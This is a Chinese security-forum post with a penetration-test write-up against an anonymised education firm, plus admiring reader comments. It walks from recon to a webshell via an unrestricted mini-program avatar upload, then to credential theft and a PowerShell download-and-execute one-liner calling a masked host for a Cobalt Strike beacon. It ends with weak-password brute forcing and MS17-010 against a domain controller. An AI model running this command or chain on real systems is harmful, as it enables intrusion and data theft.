用户
搜索
  • TA的每日心情
    慵懒
    2018-12-6 09:23
  • 签到天数: 44 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    Rank: 7Rank: 7Rank: 7

    43

    主题

    216

    帖子

    727

    魔法币
    收听
    3
    粉丝
    15
    注册时间
    2017-7-25

    i春秋签约作者i春秋推荐小组春秋文阁积极活跃奖秦

    发表于 2020-7-17 14:30:01 1713688
    本文原创作者:Xm4FDf,本文属i春秋原创奖励计划,未经许可禁止转载
    前言
    这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
    正文
    目标:www.xxxx.com(一家教育机构)
    打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
    记一次渗透getshell(2)61.png
    进行了简单的信息搜集
    子域名搜集
    记一次渗透getshell(2)87.png
    fofa找资产
    记一次渗透getshell(2)104.png
    一共七个资产。去重之后只有两个。
    目录探测
    WX20200717-132546@2x.png
    我尝试了暴力枚举,看有没有弱口令之类的,然而并没有
    我又尝试了通过修改返回包来绕过登录界面
    记一次渗透getshell(2)172.png

    还是不行,尝试注入无果
    WX20200717-132815@2x.png
    不过我目录探测出了一处Spring信息泄露
    记一次渗透getshell(2)208.png


    尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录
    记一次渗透getshell(2)261.png

    后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。
    记一次渗透getshell(2)300.png

    获取有些师傅到这一步就手机抓包电脑测了。
    Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
    其中在一个公众号发现了小程序,可以进行注册。
    看到了头像上传,尝试上传获取WebShell
    记一次渗透getshell(2)402.png

    未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
    记一次渗透getshell(2)435.png
    然后上了大马
    记一次渗透getshell(2)442.png
    记一次渗透getshell(2)444.png
    通过翻找文件发现数据库账号密码
    记一次渗透getshell(2)470.png

    --内网渗透
    直接通过powershell执行 cs上线
    powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
    记一次渗透getshell(2)610.png

    进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
    记一次渗透getshell(2)649.png
    登录爆破出来的服务器,发现多网卡且存在逻辑隔离。
    记一次渗透getshell(2)677.png
    通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭
    记一次渗透getshell(2)720.png

    小结
    渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
    当你凝望深渊时,你就不怕吗?
    发表于 2020-7-20 16:58:25
    浮生君 发表于 2020-7-20 16:53
    请问一下微信PC端抓小程序的包有教程吗,具体代理该如何设置?

    好兄弟,直接在IE设置代理就好了
    一位特爱收藏Supreme的大哥哥....
    使用道具 举报 回复
    请问一下微信PC端抓小程序的包有教程吗,具体代理该如何设置?
    使用道具 举报 回复
    发表于 2020-7-17 16:07:18
    tql,idf牛批,为啥我就遇不到没有过滤的上传
    论如何学习,我们来聊一聊经验呀784278256
    使用道具 举报 回复

    idf哥哥收徒吗,每天好想和哥哥学姿势啊
    使用道具 举报 回复
    idf哥哥收徒吗,每天好想和哥哥学姿势啊
    使用道具 举报 回复
    发表于 2020-7-17 15:48:53
    idf哥哥收徒吗,每天好想和哥哥学姿势啊
    一位特爱收藏Supreme的大哥哥....
    使用道具 举报 回复
    眼睛:会了,脑子:不,你不会
    使用道具 举报 回复
    发表于 2020-7-20 15:00:43

    学到了,都没有想到小程序...
    我欲将心向明月,奈何明月照沟渠。
                      天人照我本和兴,只是难易风化岩。
    使用道具 举报 回复
    发表于 2020-7-17 15:39:14
    表哥tql,学习到了
    使用道具 举报 回复
    tql,idf牛批
    使用道具 举报 回复
    666666
    使用道具 举报 回复
    大佬带带我
    使用道具 举报 回复
    发表于 2020-7-17 19:03:00
    思路不错,学习了
    有一天他会突然觉得累了甚至忘了初衷 放弃了梦想也许因为年纪的关系奔波于现实 然后拉黑了网络认识的所有人或者说不用了一个号码换了一个QQ 那么记得他叫大叔 这个网络他曾来过
    使用道具 举报 回复
    学习了~都tql
    使用道具 举报 回复
    发表于 2020-7-20 12:49:27
    学习学习学习学习
    使用道具 举报 回复
    tql tql tql ...
    使用道具 举报 回复
    公众号也行?
    使用道具 举报 回复
    12下一页
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册